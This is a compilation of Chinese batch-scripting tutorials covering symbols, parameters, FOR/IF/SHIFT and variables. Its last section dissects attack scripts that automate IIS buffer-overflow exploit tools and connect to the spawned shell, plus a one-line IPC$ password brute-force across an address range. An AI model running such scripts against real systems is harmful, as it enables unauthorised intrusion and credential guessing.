引用:
变量 str 的值是: abc
按任意键继续...
  另外,百分号作为变量引用还有一种特殊形式,那就是对形式参数的引用,此时,单个百分号后面紧跟0~9这10个数字,如%0、%1,请看演示代码: 
复制内容到剪贴板 
代码:
@echo off
if defined str goto next
set str=
set /p str=请把文件拉到本窗口后回车:
call "%~0" %str%
pause
exit

:next
cls
echo 本批处理文件完整路径为:"%~0"
echo 拖到本窗口的文件完整路径为:"%~1"
goto :eof
  ② 出现在 set /a 语句中时,表示两数相除取余数,也就是所谓的模运算,它在命令行窗口和批处理文件中的写法略有差异:在命令行窗口中,只需要单个的%,在批处理文件中,需要连续两个百分号,写成%%。
  例如:在命令行窗口中,运行 set /a num=4%2 ,则结果将显示0,因为4除以2的余数为0;如果保存为批处理文件,则此语句将略有改变: 
复制内容到剪贴板 
代码:
@echo off
set /a num=4%%2
echo 4除以2的余数为 %num%
pause
  ③ 转义符号:如果要显示%本身时,需要在前面用%来转义。例如: 
复制内容到剪贴板 
代码:
@echo off
echo 一个百分号:%%
echo 两个百分号:%%%%
echo 三个百分号:%%%%%%
pause
3、:、::
  ① 以:打头的单个的:表示该行是一个标签,它之后的内容是一个标签段,如:test,则表示:test之下的内容是标签段,而test是这个标签段的名,可以用 goto test 、goto :test 跳转到该标签段或用 call :test 调用该子过程;而连续两个冒号打头表示该行内容为注释内容,实际上,:: 是个无效的标签名,:加上空格同样可以起到注释的作用,此时,::的功能和注释命令rem相同;但是,rem 注释语句中的某些命令符号如重定向符号和管道符号还是会执行,而如果用::来注释的时候,与::同处一行的所有命令或符号直接被命令解释器忽略掉,无形中提高了注释的兼容性和整个程序的执行效率,并且在众多的命令语句中更显得醒目,所以,注释语句推荐使用::的格式。
  ② 在 set 语句中:和~同时使用时,: 起到截取字符串的功能。假设 set str=abcde,那么,set var=%str:~0,1% 表示截取字符串abcde的第一个字符;和=同时使用时,起到替换字符串的功能。假设:set str=abc:de,那么,set var=%str:a=1% 则表示把字符串abc:de中的a替换为1,set var=%str::=2% 则表示把字符串abc:de中的:替换为2;

4、~
  ① 用在 set 语句中,和:同时使用时,起到截取字符串的功能,请参考上一条的解释;
  ② 用在 set /a 语句中时,它是一元运算符号,表示将操作数字按位取反,例如,set /a num=~1的执行结果是-2,set /a num=~0的结果是-1
  ③ 用在for语句中,表示增强for的功能,能够提取到更多的信息。例如:在批处理文件的for语句中:%%~i表示去掉第一对外侧引号,%%~zi表示获取文件的大小(以字节为单位),%%~ni表示获取文件名,%%~xi表示获取扩展名(带点号)……它们可以组合使用,如%%~nxi表示获取文件名和后缀名。

5、>、>>
  一般而言,>表示用新内容覆盖原文件内容,>>表示向原文件追加内容,此时,它们以重定向符号的身份出现;如果用在 set /a 语句中,则>表示分组,>>表示逻辑移位;

6、|
  一般而言,它以管道符号的身份出现,表示把在它之前的命令或语句的执行结果作为在它之后的命令或语句的处理对象,简而言之,就是把它之前的输出作为它之后的输入,例如:echo abcd|findstr "b",表示把echo abcd的执行结果,作为findstr "b" 的执行对象,也就是在字符串abcd中查找b字符;如果test.txt中有abcd字符串,则该语句与 findstr "b" test.txt 具有同样的效果;

7、^
  一般而言,^以转义字符的身份出现。因为在cmd环境中,有些字符具备特殊功能,如>、>>表示重定向,|表示管道,&、&&、||表示语句连接……它们都有特定的功能,如果需要把它们作为字符输出的话,echo >、echo | ……之类的写法就会出错——cmd解释器会把它们作为具有特殊功能的字符对待,而不会作为普通字符处理,这个时候,就需要对这些特殊字符做转义处理:在每个特殊字符前加上转义字符^,因此,要输出这些特殊字符,就需要用 echo ^>、echo ^|、echo ^|^|、echo ^^……之类的格式来处理;

8、&
  一般而言,&表示两条命令或语句同时执行的意思。如 echo a&echo b,将在屏幕上同时显示a和b字符。当几条语句含义近似或作用相同且没有先后的顺序之别时,启用&符号连接这些语句将会增加程序的可读性;

9、&&、||
  这是一对含义截然相反的命令符,&&表示如果它之前的语句成功执行,将执行它之后的语句,而||则表示如果它之前的语句执行失败,将执行它之后的语句;在某些场合,它们能替代 if……else…… 语句;例如: 
复制内容到剪贴板 
代码:
@echo off
md test&&echo 成功创建文件夹test||echo 创建文件夹test失败
pause
  效果等同于如下代码: 
复制内容到剪贴板 
代码:
@echo off
md test
if "%errorlevel%"=="0" (echo 成功创建文件夹test) else echo 创建文件夹test失败
pause
10、()
  小括号对经常出现在for语句和if语句中,还有一些特定场合;在for和if语句中属于语句格式的要求,例如:
  ① for %%i in (语句1) do (语句2):在这条语句中,语句1必须用括号对包围,而语句2的括号对则可视情况予以抛弃或保留:如果语句2是单条语句或用&、&&、||等连接符号连接的多条语句,括号对可以抛弃,如果语句2是有逻辑先后关系的多条语句集合,则必须保留括号对,并且,多条语句必须断行书写;例如: 
复制内容到剪贴板 
代码:
@echo off
for %%i in (a b c) do echo %%i&echo --------
pause
  也可以改写为: 
复制内容到剪贴板 
代码:
@echo off
for %%i in (a b c) do (
echo %%i
&echo --------
)
pause
  ② if 条件 (语句1) else (语句2):如果没有else部分,则语句1的括号对可有可无;如果有else部分,则语句1中的括号对必须保留,此时,语句2中的括号对保留与否,和上一点类似。例如: 
复制内容到剪贴板 
代码:
@echo off
if exist test.txt echo 当前目录下有test.txt
pause
复制内容到剪贴板 
代码:
@echo off
if exist test.txt (echo 当前目录下有test.txt) else echo 当前目录下没有test.txt
pause
复制内容到剪贴板 
代码:
@echo off
if exist test.txt (echo 当前目录下有test.txt) else (
echo 当前目录下没有test.txt
pause
cls
echo 即将创建test.txt文件
cd.>test.txt&&echo 成功创建test.txt
)
pause
  ③ 特定场合下使用括号对,不但可以使代码逻辑清晰,增强可读性,还可能会减少代码量。比如用echo语句构造多行文本内容的时候: 
复制内容到剪贴板 
代码:
@echo off
(
echo 第一行
echo 第二行
echo 第三行
)>test.txt
start test.txt
  如果不使用括号对的话,则需要使用如下代码: 
复制内容到剪贴板 
代码:
@echo off
echo 第一行>test.txt
echo 第二行>>test.txt
echo 第三行>>test.txt
start test.txt
11、+、-、*、/
  在 set /a 语句中,这些符号的含义分别为:加、减、乘、除。例如:set /a num=1+2-3*4/5。需要注意的是,这些运算符号遵循数学运算中的优先级顺序:先乘除后加减,有括号的先算括号,并且,直接忽略小数点,因此,刚才那个算式的结果是1而不是0或0.6。
  另外,有可能会在代码中看到这样的写法:set /a num+=1、set /a num-=1、set /a num*=1 和 set /a num/=1,这些表示累加、累减、累乘、累除,步长都是1,展开后的完整写法为:set /a num=num+1、set /a num=num-1、set /a num=num*1 和 set /a num=num/1(set /a 语句中,变量引用可以忽略百分号对或感叹号对,set /a num=%num%+1 与 set /a num=num+1 等同)

12、equ、neq、lss、leq、gtr、geq
  这几个命令符是if语句中常用到的数值比较符号,取自英文的关键字母,具体的含义为: 
引用:
命令符号 含义 英文解释
EQU 等于 equal
NEQ 不等于 not equal
LSS 少于 less than
LEQ 少于或等于 less than or equal
GTR 大于 greater than
GEQ 大于或等于 greater than or equal  


BAT CMD 批处理文件脚本总结

http://tech.ddvip.com/2010-02/1265189962144653.html

REM [comment]: 批处理文件的注释符,可以使用“::” 来代替REM。

参数。

  %0对应文件名本身,其他分别对应一个参数值,支持255个参数。

  Test.cmd   1   2   3   …   n   …   255
  %0   %1   %2   %3   …   %n   …   %255

文件名参数扩展。

  当使用文件名作参数的时候,可以使用如下文件名扩展。下面的例子扩展%1,其实对所有的参数都可以进行类似的扩展。 %~f1 - 扩展%1 为带路径的全名。 %~d1 - 只显示磁盘名称。 %~p1 - 只显示文件路径。 %~n1 - 只显示文件名,不包括后缀名,也不包括路径。 %~x1 - 只显示后缀名。 %~s1 - 变成短文件名,将包含“~”符号。 %~1 - 有时候文件名包含空格是,会对文件名加双引号。这个功能是去掉双引号。 %~a1 - 显示文件的属性。 %~t1 - 显示文件的修改时间。 %~z1 - 显示文件的大小。  

  上面的扩展是可以组合的:

  %~dp1 - 扩展%1 为磁盘名称和路径名。

  %~nx2 - 扩展%2 为文件名和文件后缀名。

DOS下批处理的几个小技巧

1、如何截取字符串(类似substr的功能)

我们知道,在shell里,可以使用awk或cut或shell脚本自身的{}来截取。

在批处理里面尝试了下substr,没成功。还是google,果然发现好方法:

如,%date%命令默认为:

2010-01-28 星期四

这种形式,我们想要截取前面的10个字符,则可以:

%date:~0,10%

结果就是2010-01-28了。

2、如何换行

在批处理文件中,默认一行就是一条命令,如果想要换行,就可能会出现invalid command这样的错误。如何解决呢?嘿嘿!用^就可以实现了。

比如说我要在批处理里面执行一个oracle导入命令,但又不想用parfile参数来实现。就可以这么做了:

exp%username%/%password%@%linkstr%  ^

log=%logfile% ^

file=%dumpfile% ^

tables=(aa,bb,cc) ^

buffer=40960000 ^

direct=n ^

indexes=n ^

constraints=n ^

grants=n

这样脚本就把以上所有行都认做是一行来处理了。

3、变量设定及引用

这个其实在前面已经涉及到了,比如设定用户名:

set username=regonly1

则引用username变量如下:%username%。

另外,技巧性的,批处理的一些重要命令:

最近好多猜测弱口令的病毒在网上流行,比如前段时间闹得很厉害的Worm.Dvldr 蠕虫就是一个典型。这些病毒有个共同点就是利用批处理来进行ipc$连接,从而来猜测管理员的口令达到控制服务器的目的。病毒由几个文件和几个复杂的批处理组成。批处理算不上真正意义上的编程,但是它的一些思想和编程比较近似。通过在网上和一些初学的朋友交流,发现他们对于批处理很感兴趣,多多少少了解一些命令的用法,但缺乏比较系统的了解,所以特意写下这篇教程,好让感兴趣的朋友对批处理有个整体的认识,并能通过该教程举一反三,写出自己的批处理。

该教程一共分为4大部分,

第一部分是批处理的专用命令,

第二部分是特殊的符号与批处理,

第三部分是批处理与变量,

第四部分是完整案例。

第一部分:批处理的专用命令

批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件,其扩展名为BAT。这些命令统称批处理命令,下面我就来给大家介绍一下批处理的命令。

1、 REM

REM 是个注释命令一般是用来给程序加上注解的,该命令后的内容在程序执行的时候将不会被显示和执行。例:

REM 你现在看到的就是注解,这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。

2、 ECHO

ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例:

Code:
Echo off

Rem 以上代表关闭回显即不显示所执行的命令

Echo 这个就是消息。

Rem 以上代表显示“这就是消息”这列字符


执行结果:

C:\\>ECHO.BAT

这个就是消息。

3、 GOTO

GOTO 即为跳转的意思。在批处理中允许以“:XXX”来构建一个标号然后用GOTO :标号直接来执行标号后的命令。例

:LABEL

REM 上面就是名为LABEL的标号。

DIR C:\\

DIR D:\\

GOTO LABEL

REM 以上程序跳转标号LABEL处继续执行。

4、CALL

CALL 命令可以在批处理执行过程中调用另一个批处理,当另一个批处理执行完后再继续执行原来的批处理。例:

批处理2.BAT内容如下:

ECHO 这就是2的内容

批处理1.BAT内容如下:

ECHO 这是1的内容

CALL 2.BAT

ECHO 1和2的内容全部显示完成

执行结果如下:

C:\\>1.BAT

这是1的内容

这就是2的内容

1和2的内容全部显示完成

5、PAUSE

PAUSE 停止系统命令的执行并显示下面的内容。例:

C:\\> PAUSE

请按任意键继续 . . .

6、 IF

IF 条件判断语句,语法格式如下:

IF [NOT] ERRORLEVEL number command

IF [NOT] string1==string2 command

IF [NOT] EXIST filename command

说明:

[NOT] 将返回的结果取反值即“如果没有”的意思。

ERRORLEVEL 是命令执行完成后返回的退出值

Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。

string1==string2 string1和string2都为字符的数据,英文字符的大小写将看做不同,这个条件中的等于号必须是2个(绝对相等),条件想等后即执行后面的 command

EXIST filename 为文件或目录存在的意思。

IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。

例:

1、 IF [NOT] ERRORLEVEL number command

检测命令执行完后的返回值做出判断。

echo off

dir z:

rem 如果退出代码为1(不成功)就跳至标题1处执行

IF ERRORLEVEL 1 goto 1

rem 如果退出代码为0(成功)就跳至标题0处执行

IF ERRORLEVEL 0 goto 0

:0

echo 命令执行成功!

Rem 程序执行完毕跳至标题exit处退出

goto exit

:1

echo 命令执行失败!

Rem 程序执行完毕跳至标题exit处退出

goto exit

:exit

Rem 这里是程序的出口

2、 IF string1==string2 command

检测当前变量的值做出判断

ECHO OFF

IF %1==2 goto no

Echo 变量相等!

Goto exit

:no

echo 变量不相等

goto exit

:exit

大家可以这样看效果 C:\\>test.bat 数字

3、 IF [NOT] EXIST filename command

发现特定的文件做出判断

echo off

IF not EXIST autoexec.bat goto 1

echo 文件存在成功!

goto exit

:1

echo 文件不存在失败!

goto exit

:exit

这个批处理大家可以放在c盘和d盘分别执行看看效果。

7、 FOR

FOR这个命令比较特殊是一个循环执行命令的命令,同时FOR的循环里面还可以套用FOR在进行循环
这篇我们介绍基本的用法就不做套用的循环了,后面再来讲解套用的循环。在批处理中FOR的命令如下:

FOR [%%c] IN (set) DO [command] [arguments]

在命令行中命令如下:

FOR [%c] IN (set) DO [command] [arguments]

常用参数:

/L 该集表示以增量形式从开始到结束的一个数字序列。因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生序列 (5 4 3 2 1)。

/D 如果集中包含通配符,则指定与目录名匹配,而不与文件名匹配。

/F 从指定的文件中读取数据作为变量

eol=c - 指一个行注释字符的结尾(就一个)

skip=n - 指在文件开始时忽略的行数。

delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。

tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号,那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。

usebackq - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。

下面来看一个例子:

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或空格定界符号。请注意,这个 for 程序体的语句引用 %i 来取得第二个符号,引用 %j 来取得第三个符号,引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名,您需要用双引号将文件名括起来。为了用这种方式来使用双引号,您还需要使用 usebackq 选项,否则,双引号会被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明,%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号,只要不试图说明一个高于字母 \'z\' 或\'Z\' 的变量。请记住,FOR 变量名分大小写,是通用的;而且,同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,用单引号将括号之间的 filenameset 括起来。这样,该字符串会被当作一个文件中的一个单一输入行。最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进内存,并被当作文件分析。因此,以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

以下列举一个简单的例子,他将说明参数/L和没有参数的区别:

删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT

例:

ECHO OFF

FOR /L %%F IN (1,1,5) DO DEL %%F.TXT

FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT

以上2条命令执行的结果都是一样的如下:

C:\\>DEL 1.TXT

C:\\>DEL 2.TXT

C:\\>DEL 3.TXT

C:\\>DEL 4.TXT

C:\\>DEL 5.TXT

8、 SETLOCAL

开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后

所做的环境改动只限于批处理文件。要还原原先的设置,必须执

行 ENDLOCAL。 达到批处理文件结尾时,对于该批处理文件的每个

尚未执行的 SETLOCAL 命令,都会有一个隐含的 ENDLOCAL 被

执行。例:

@ECHO OFF

SET PATH /*察看环境变量PATH

PAUSE

SETLOCAL

SET PATH=E:\\TOOLS /*重新设置环境变量PATH

SET PATH

PAUSE

ENDLOCAL

SET PATH

从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:\\TOOLS后显示为E:\\TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。

9、 SHIFT

SHIFT命令可以让在命令上的的命令使用超过10个(%0~%9)以上的可替代参数例:

ECHO OFF

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

执行结果如下:

C::\\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

1 2 3 4 5 6 7 8 9

2 3 4 5 6 7 8 9 10

3 4 5 6 7 8 9 10 11

以上就是基于WIN2000下的9个批处理命令。

第二部分:特殊的符号与批处理

在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。

1、 符号(@)

@在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求

2、 符号(>)

>的意思是传递并覆盖
他所起的作用是将运行后的回显结果传递到后面的范围(后面可是文件也可是默认的系统控制台)例:

文件1.txt的文件内容为:

1+1

使用命令c:\\>dir *.txt >1.txt

这时候1.txt的内容如下

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C:\\ 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 个文件 18,630,070 字节

0 个目录 1,191,542,784 可用字节

>将命令执行的结果覆盖了原始的文件内容。

在传递给控制台的时候程序将不会有任何回显(注意:这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显,这里的回显是程序执行中或后的回显)例:

C:\\>dir *.txt >nul

程序将没有任何显示也不会产生任何痕迹。

3、 符号(>>)

符号>>的作用与符号>相似,但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台(用法同上)
例:

文件1.txt内同为:

1+1

使用命令c:\\>dir *.txt >>1.txt

这时候1.txt的内容如下

1+1

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C:\\ 的目录

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 个文件 18,630,070 字节

0 个目录 1,191,542,784 可用字节

>>将命令执行的结果覆加在了原始的文件内容后面。

4、 符号(|)

|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例:

C:\\>dir c:\\|find "1508"

卷的序列号是 301A-1508

以上命令的意思为查找c:\\的所有并发现1508字符串。Find的用法请用 find /?自行查看

在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的

echo y|format a: /s /q /v:system

用过format命令的人都知道format有一个交互对化过程,要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的(这条命令有危害性,测试的时候请谨慎)

5、 符号(^)

^ 是对特殊符号 > 、<、 &的前导字符。在命令中他将以上的3个符号的特殊功能去掉仅仅只把他们当成符号而不使用他们的特殊意义。例:

c:\\>echo test ^> 1.txt

test > 1.txt

从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。

6、 符号(&)

&符号允许在一行中使用2个以上不同的命令,当第一个命令执行失败将不影响第2个命令的执行。例:

c:\\> dir z:\\ &dir y:\\ &dir c:\\

以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。

7、 符号(&&)

&&符号也是允许在一行中使用2个以上不同的命令,当第一个命令执行失败后后续的命令将不会再被执行。例:

c:\\> dir z:\\ &&dir y:\\ &&dir c:\\

以上的命令将会提示检查是否存在z:盘如果存在则执行,如果不存在则停止执行所有的后续命令

8、 符号(" ")

" "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:

c:\\>cd “Program Files”

c:\\>cd progra~1

c:\\>cd pro*

以上方法都可以进入Program Files目录

9、 符号(,)

,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例:

c:\\>dir,c:\\

10、 符号(;)

;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例:

DIR C:\\;D:\\;E:\\F:\\

以上的命令相当于

DIR C:\\

DIR D:\\

DIR E:\\

DIR F:\\

当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

第三部分:批处理与变量

在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。
引用shift命令的例子如果把%1前面多加上一个%0那么结果如下:

C::\\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

SHIFT.BAT 1 2 3 4 5 6 7 8 9

1 2 3 4 5 6 7 8 9 10

2 3 4 5 6 7 8 9 10 11

系统是如何区分每个变量的呢,系统区分变量的规则为字符串中间的空格,即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例:

批处理内容为:

ECHO %1

ECHO %2

ECHO %3

输入命令:

C:\\>TEST “Program Files” Program Files

Program Files

Program

Files

在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢?在系统中还有一种变量称之为环境变量(使用SET命令可以查看当前系统的环境变量)如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候,我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用,环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子,批处理如下:

ECHO OFF

SET PASS=%1

SHIFT

SET PASS1=%1

SHIFT

ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %PASS% %PASS1% %9

SET PASS=%PASS1% 变量的传递

SET PASS1=%9

SHIFT

ECHO %PASS% %PASS1% %9

使用命令:C:\\>TEST A B 3 4 5 6 7 8 9 10 K L

A B 3 4 5 6 7 8 9 10 K 注意:这一行显示了11个变量

A B L 在使用了3次SHIFT之后%9变成了L

B L 变量的传递后的结果

第四部分:完整案例

以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理,看看他们是怎么运作的。这里我将列举三个例子来详细分析,为了保持程序的完整我的注释会加在/*后面。

例一

这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为:

iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本,我们编制的批处理使用的命令格式为 开始版本号可有可无。程序如下。

@echo off /*关闭命令回显

if "%1%"=="" goto help /*判断%1是否为空,%1为目标ip

if "%2%"=="1" goto 1 /*判断%2是否为1,为1则跳转标志1

if "%2%"=="2" goto 2 /*%2为开始版本号,如果没有设置则

if "%2%"=="3" goto 3 /*如果存在则从匹配的地方开始执行

if "%2%"=="4" goto 4

if "%2%"=="5" goto 5

if "%2%"=="6" goto 6

if "%2%"=="7" goto 7

if "%2%"=="8" goto 8

if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容

ping %1 -n 1 | find "Received = 1" /*ping目标1次,从结果中发现Received = 1

if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行)

iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good)

if not errorlevel 1 goto telnet /*如果没有错误代码1(溢出成功)就执行telnet段的内容。

echo 操作系统类型 9 失败! /否则显示这一句

:8 /*以下代码内容参照上面

iis5hack %1 80 8 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 8 失败!

:7

iis5hack %1 80 7 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 7 失败!

:6

iis5hack %1 80 6 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 6 失败!

:5

iis5hack %1 80 5 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 5 失败!

:4

iis5hack %1 80 4 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 4 失败!

:3

iis5hack %1 80 3 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 3 失败!

:2

iis5hack %1 80 2 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 2 失败!

:1

iis5hack %1 80 1 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 1 失败!

:0

iis5hack %1 80 0 88 | find "good"

if not errorlevel 1 goto telnet

echo 操作系统类型 0 失败!

goto error

:telnet

telnet %1 88 /*开始连接目标ip的88端口

goto exit /*连接中断后跳转exit段

:error /*error段显示错误后的帮助信息

echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!

echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]

ECHO 中文: 0

ECHO 中文+sp1: 1

ECHO 英文: 2

ECHO 英文+sp1: 3

ECHO 日语: 4

ECHO 日语+sp1: 5

ECHO 韩文: 6

ECHO 韩文+sp1: 7

ECHO 墨西哥语: 8

ECHO 墨西哥语+sp1: 9

goto exit /*跳转exit段

:file /*file段显示文件没有发现的信息

echo 文件iis5hack.exe没有发现!程序终止运行!

goto exit /*跳转exit段

:help /*help段显示本批处理的使用格式帮助

echo 本程序用法如下:

echo iis [目标ip]

echo iis [目标ip] [开始的号码9-0]

:exit /*exit段为程序出口

这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大!

例二

这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下:

运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>

其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。

其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 程序如下:

@echo off /*同例一

if not EXIST iisidq.exe goto file /*同例一

if %1 == "" goto error /*同例一

ping %1 -n 1 | find "Received = 1" /*同例一

if errorlevel 1 goto error1 /*同例一

set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip

set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。

:no /*no段开始

if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。

if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码,用计数器来控制其

if %a%==2 set d=2 /*变动。

if %a%==3 set d=3

if %a%==4 set d=4

if %a%==5 set d=5

if %a%==6 set d=6

if %a%==7 set d=7

if %a%==9 set d=9

if %a%==10 set d=13

if %a%==11 set d=14

goto 0 /*变量传递完成后转到标志0处运行

:1

echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......

:0 /*标志0开始

IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good)

if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳

/*转标志1处继续尝试发送

ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执

/*行结果

echo 正在执行第%d%项! /*报告正在溢出的操作系统类型

telnet %b% 99 /*连接溢出端口

echo. /*显示一个空行

if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处(循环出口)

if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值

if %d%==9 set a=10

if %d%==7 set a=9

if %d%==6 set a=7

if %d%==5 set a=6

if %d%==4 set a=5

if %d%==3 set a=4

if %d%==2 set a=3

if %d%==1 set a=2

if %d%==0 set a=1

goto no /*附值完成跳转no段执行

:file /*以下都是出错后的帮助提示

echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!

goto exit

:error

echo 错误!目标ip不可识别!请使用下面的格式连接!

echo idq [目标IP]

goto exit

:error1

echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!

echo 请按照下面的格式手工尝试!

echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口]

echo telnet [目标ip] [溢出端口]

:exit /*整个程序的出口

这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。

例三

for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\\\%1.%%a.%%b.%%c\\ipc$ %%e /u:%%f

上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为:C:\\>TEST.BAT 218 当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令 (这里我把上面的值都带进去,设密码为123 用户名为 abc)

net usr \\\\218.0.0.1\\ipc$ 123 /u:abc

